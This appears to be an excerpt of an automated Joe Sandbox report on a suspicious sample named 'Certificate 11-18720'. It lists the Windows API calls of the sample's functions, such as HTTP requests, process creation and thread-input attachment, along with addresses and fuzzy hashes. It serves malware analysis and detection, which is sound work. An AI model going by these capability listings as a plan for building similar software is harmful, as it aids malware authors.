                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                    • API String ID: 4194297153-14809454
                                                                                    • Opcode ID: d9a700ecc4846b2b05e3bfd8176147a7641e68143c17b898739a9c0fb63f961c
                                                                                    • Instruction ID: 7b19dc9222ccac3a1a3cc1be0ec656a8f63522f566b76200368054c5ec5d4480
                                                                                    • Opcode Fuzzy Hash: d9a700ecc4846b2b05e3bfd8176147a7641e68143c17b898739a9c0fb63f961c
                                                                                    • Instruction Fuzzy Hash: 41317E35A4021A9FDB05EFA4C849EAEBBF6FF55300F14881AE505EB3D1DB719A02C751
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 005FB98C
                                                                                    • GetDlgCtrlID.USER32 ref: 005FB997
                                                                                    • GetParent.USER32 ref: 005FB9B3
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 005FB9B6
                                                                                    • GetDlgCtrlID.USER32(?), ref: 005FB9BF
                                                                                    • GetParent.USER32(?), ref: 005FB9DB
                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 005FB9DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 1383977212-1403004172
                                                                                    • Opcode ID: 11e2dd0fbc6a90005283e5a9cbe7fbfbaf82f77f4aa66b6b1045eb2ae0b1eab8
                                                                                    • Instruction ID: 04735e1a26bbf9ee9df5fb53b7fb03d617e2659de9c9cd8fcbe431184b3f63d0
                                                                                    • Opcode Fuzzy Hash: 11e2dd0fbc6a90005283e5a9cbe7fbfbaf82f77f4aa66b6b1045eb2ae0b1eab8
                                                                                    • Instruction Fuzzy Hash: 3521C474A00109BFDB04ABA4CC85EBEBF75FB46300F104119F65597291DBB958159B20
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 005FBA73
                                                                                    • GetDlgCtrlID.USER32 ref: 005FBA7E
                                                                                    • GetParent.USER32 ref: 005FBA9A
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 005FBA9D
                                                                                    • GetDlgCtrlID.USER32(?), ref: 005FBAA6
                                                                                    • GetParent.USER32(?), ref: 005FBAC2
                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 005FBAC5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 1383977212-1403004172
                                                                                    • Opcode ID: dbcec9185b6d46a622948e72e9f45961600e8dd4c3ed5107a7790165ab1a3d16
                                                                                    • Instruction ID: 92093dfd5e8ea1516ef340a3d8b07931c6bd375a195eda87c48592dbe76abfb9
                                                                                    • Opcode Fuzzy Hash: dbcec9185b6d46a622948e72e9f45961600e8dd4c3ed5107a7790165ab1a3d16
                                                                                    • Instruction Fuzzy Hash: 6921F2B4A00109BFDB01ABA4CC85FFEBF7AFF4A300F044019F655A7192DB7988199B20
                                                                                    APIs
                                                                                    • GetParent.USER32 ref: 005FBAE3
                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 005FBAF8
                                                                                    • _wcscmp.LIBCMT ref: 005FBB0A
                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 005FBB85
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                    • API String ID: 1704125052-3381328864
                                                                                    • Opcode ID: 71dfbe73eaa3535c5594b511fd05433b93ae795d690492fabb21af5b08f7dc18
                                                                                    • Instruction ID: f8a0fa07ff9e8f7eb24be613bf80eca5d74bd4674dd322f2f7ee3f768e0179f6
                                                                                    • Opcode Fuzzy Hash: 71dfbe73eaa3535c5594b511fd05433b93ae795d690492fabb21af5b08f7dc18
                                                                                    • Instruction Fuzzy Hash: 92112C76A4834BFBFA246631DC1BDB63F9EFB51720F200022FA58E40D5FFA598514514
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 0061B2D5
                                                                                    • CoInitialize.OLE32(00000000), ref: 0061B302
                                                                                    • CoUninitialize.OLE32 ref: 0061B30C
                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0061B40C
                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0061B539
                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0061B56D
                                                                                    • CoGetObject.OLE32(?,00000000,0064D91C,?), ref: 0061B590
                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 0061B5A3
                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0061B623
                                                                                    • VariantClear.OLEAUT32(0064D91C), ref: 0061B633
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 2395222682-0
                                                                                    • Opcode ID: 7bae5cf4afcf3362c0fa8feed732f3a962d1263b17f7c405fd6d15576d900ed1
                                                                                    • Instruction ID: 13e57ef63f28083fb1362443fada0614c3ed8a371e08989661b4228a565900f1
                                                                                    • Opcode Fuzzy Hash: 7bae5cf4afcf3362c0fa8feed732f3a962d1263b17f7c405fd6d15576d900ed1
                                                                                    • Instruction Fuzzy Hash: C9C12471608305AFC700DF64C884AABBBEABF89308F04595DF58ADB251DB71ED45CB52
                                                                                    APIs
                                                                                    • __lock.LIBCMT ref: 005EACC1
                                                                                      • Part of subcall function 005E7CF4: __mtinitlocknum.LIBCMT ref: 005E7D06
                                                                                      • Part of subcall function 005E7CF4: EnterCriticalSection.KERNEL32(00000000,?,005E7ADD,0000000D), ref: 005E7D1F
                                                                                    • __calloc_crt.LIBCMT ref: 005EACD2
                                                                                      • Part of subcall function 005E6986: __calloc_impl.LIBCMT ref: 005E6995
                                                                                      • Part of subcall function 005E6986: Sleep.KERNEL32(00000000,000003BC,005DF507,?,0000000E), ref: 005E69AC
                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 005EACED
                                                                                    • GetStartupInfoW.KERNEL32(?,00676E28,00000064,005E5E91,00676C70,00000014), ref: 005EAD46
                                                                                    • __calloc_crt.LIBCMT ref: 005EAD91
                                                                                    • GetFileType.KERNEL32(00000001), ref: 005EADD8
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 005EAE11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                    • String ID:
                                                                                    • API String ID: 1426640281-0
                                                                                    • Opcode ID: 319e805f5d1483064e060ef009b97065dcbaf48db8a8e8d1a6f0bb1cbf81e7f9
                                                                                    • Instruction ID: 987a3d85618cf4549f63a026c34405bc8a15f6b38e5e7982d451a92179416889
                                                                                    • Opcode Fuzzy Hash: 319e805f5d1483064e060ef009b97065dcbaf48db8a8e8d1a6f0bb1cbf81e7f9
                                                                                    • Instruction Fuzzy Hash: 3081F2719053828FDB28CF79C8845A9BFF5BF46320B24569DD4E6AB3D1C734A802CB52
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00604047
                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006030A5,?,00000001), ref: 0060405B
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00604062
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006030A5,?,00000001), ref: 00604071
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00604083
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,006030A5,?,00000001), ref: 0060409C
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006030A5,?,00000001), ref: 006040AE
                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006030A5,?,00000001), ref: 006040F3
                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,006030A5,?,00000001), ref: 00604108
                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,006030A5,?,00000001), ref: 00604113
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                    • String ID:
                                                                                    • API String ID: 2156557900-0
                                                                                    • Opcode ID: 59937f05024d91455f3ae7c6bf98dcbfc8457b4cf74c328e04404f8d2228835f
                                                                                    • Instruction ID: db5750259dc368a5bdef658685087c5b3ebf69be5f780619847f119ba681319d
                                                                                    • Opcode Fuzzy Hash: 59937f05024d91455f3ae7c6bf98dcbfc8457b4cf74c328e04404f8d2228835f
                                                                                    • Instruction Fuzzy Hash: D831E1B5940210BFDB24DF14DC86BBA77ABABA0711F119205FA05E63E0CFB499808B64
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000008), ref: 005DB496
                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 005DB4A0
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 005DB4B5
                                                                                    • GetStockObject.GDI32(00000005), ref: 005DB4BD
                                                                                    • GetClientRect.USER32(?), ref: 0063DD63
                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0063DD7A
                                                                                    • GetWindowDC.USER32(?), ref: 0063DD86
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0063DD95
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0063DDA7
                                                                                    • GetSysColor.USER32(00000005), ref: 0063DDC5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3430376129-0
                                                                                    • Opcode ID: 2a436d4d8a9939ba09f7a537bca5e9232165349262949a84a5074acdcc9c1200
                                                                                    • Instruction ID: dc8e881e0bcbb5e3798fd543b4d545355955faa04b853062f908562c93ca2d21
                                                                                    • Opcode Fuzzy Hash: 2a436d4d8a9939ba09f7a537bca5e9232165349262949a84a5074acdcc9c1200
                                                                                    • Instruction Fuzzy Hash: 1B114C39900205FFEB216FA4EC08BE97F67FB06325F119626FA66951E2CB310941DB21
                                                                                    APIs
                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 005C30DC
                                                                                    • CoUninitialize.OLE32(?,00000000), ref: 005C3181
                                                                                    • UnregisterHotKey.USER32(?), ref: 005C32A9
                                                                                    • DestroyWindow.USER32(?), ref: 00635079
                                                                                    • FreeLibrary.KERNEL32(?), ref: 006350F8
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00635125
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                    • String ID: close all
                                                                                    • API String ID: 469580280-3243417748
                                                                                    • Opcode ID: 10dcd25ebc1bb7019651755daf5e4f8f6252aefd69e2320b70fb271dd721ff5b
                                                                                    • Instruction ID: 0aad515ec4e0050785e7aaba2e0c9a844e8935e4b82231a1dd069d7c3a0ead74
                                                                                    • Opcode Fuzzy Hash: 10dcd25ebc1bb7019651755daf5e4f8f6252aefd69e2320b70fb271dd721ff5b
                                                                                    • Instruction Fuzzy Hash: 449138346002068FC719EF94C899F68FBA5FF45304F5492ADE40AAB262DF31AE56CF54
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 005DCC15
                                                                                      • Part of subcall function 005DCCCD: GetClientRect.USER32(?,?), ref: 005DCCF6
                                                                                      • Part of subcall function 005DCCCD: GetWindowRect.USER32(?,?), ref: 005DCD37
                                                                                      • Part of subcall function 005DCCCD: ScreenToClient.USER32(?,?), ref: 005DCD5F
                                                                                    • GetDC.USER32 ref: 0063D137
                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0063D14A
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0063D158
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0063D16D
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0063D175
                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0063D200
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                    • String ID: U
                                                                                    • API String ID: 4009187628-3372436214
                                                                                    • Opcode ID: 972d55517de2741d5cbd0852f652c7724ce0b202429941443f77a642a3abad49
                                                                                    • Instruction ID: afb04493a8aa99a32d7812e47b61e6f4fdb2a06c2944f4a43e9c887a82e972a7
                                                                                    • Opcode Fuzzy Hash: 972d55517de2741d5cbd0852f652c7724ce0b202429941443f77a642a3abad49
                                                                                    • Instruction Fuzzy Hash: 5471CE31400205EFCF219F68D885AEA7FB6FF49350F14466AED555A3A6D7318C81DFA0
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006145FF
                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0061462B
                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0061466D
                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00614682
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0061468F
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 006146BF
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00614706
                                                                                      • Part of subcall function 00615052: GetLastError.KERNEL32(?,?,006143CC,00000000,00000000,00000001), ref: 00615067
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                    • String ID:
                                                                                    • API String ID: 1241431887-3916222277
                                                                                    • Opcode ID: d16a564472b981837d9d774877c7af0fac1ed33dbef49dbae910a180c8103f6a
                                                                                    • Instruction ID: 7c5a359b5173c2ec25282261111412931d2949925c84cfa59c58356f1636ef98
                                                                                    • Opcode Fuzzy Hash: d16a564472b981837d9d774877c7af0fac1ed33dbef49dbae910a180c8103f6a
                                                                                    • Instruction Fuzzy Hash: 2A417FB5901205BFEB019F50CC85FFB77AEFF0A358F08401AFA059B181DBB099858BA4
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0065DC00), ref: 0061B715
                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0065DC00), ref: 0061B749
                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0061B8C1
                                                                                    • SysFreeString.OLEAUT32(?), ref: 0061B8EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                    • String ID:
                                                                                    • API String ID: 560350794-0
                                                                                    • Opcode ID: 9a8dbf87026487b9706ab57ef554ba12d0eb99b702a4d17044f0fd9efbed185a
                                                                                    • Instruction ID: 17463648196c5a3cb1807730b1377c6952be8f0777cf259c68afd6bc9f07427a
                                                                                    • Opcode Fuzzy Hash: 9a8dbf87026487b9706ab57ef554ba12d0eb99b702a4d17044f0fd9efbed185a
                                                                                    • Instruction Fuzzy Hash: B6F11A75A00109AFCF04DF94C884EEEBBBAFF89715F148458F905AB250DB71AD86CB90
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 006224F5
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00622688
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006226AC
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006226EC
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0062270E
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0062286F
                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006228A1
                                                                                    • CloseHandle.KERNEL32(?), ref: 006228D0
                                                                                    • CloseHandle.KERNEL32(?), ref: 00622947
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                    • String ID:
                                                                                    • API String ID: 4090791747-0
                                                                                    • Opcode ID: 569b7024a733d6729e1fc104cfd27578481654177a72193b6a28872b2d93e116
                                                                                    • Instruction ID: f5b9027abf849a2bd91c94cee1ccde1b3af29a8423061cf86957c39c4855bcd3
                                                                                    • Opcode Fuzzy Hash: 569b7024a733d6729e1fc104cfd27578481654177a72193b6a28872b2d93e116
                                                                                    • Instruction Fuzzy Hash: 41D1BF31604652AFC714EF24D8A5B6ABBE2BF85310F14845DF8899B3A2DB30DC45CF52
                                                                                    APIs
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0062B3F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 634782764-0
                                                                                    • Opcode ID: f24e321e0799059feceb5b38bb74451524f80703d5a842e8e3fa47d5786412a6
                                                                                    • Instruction ID: e8a8eb8efa83675c2d1a6a94cedacf1f136fe0058440eb226189e154170f9eee
                                                                                    • Opcode Fuzzy Hash: f24e321e0799059feceb5b38bb74451524f80703d5a842e8e3fa47d5786412a6
                                                                                    • Instruction Fuzzy Hash: DA51A630500A25BBEF20AF18EC89B9D7BA7FB05314F246116F615EA2E2D771E9408F55
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0063DB1B
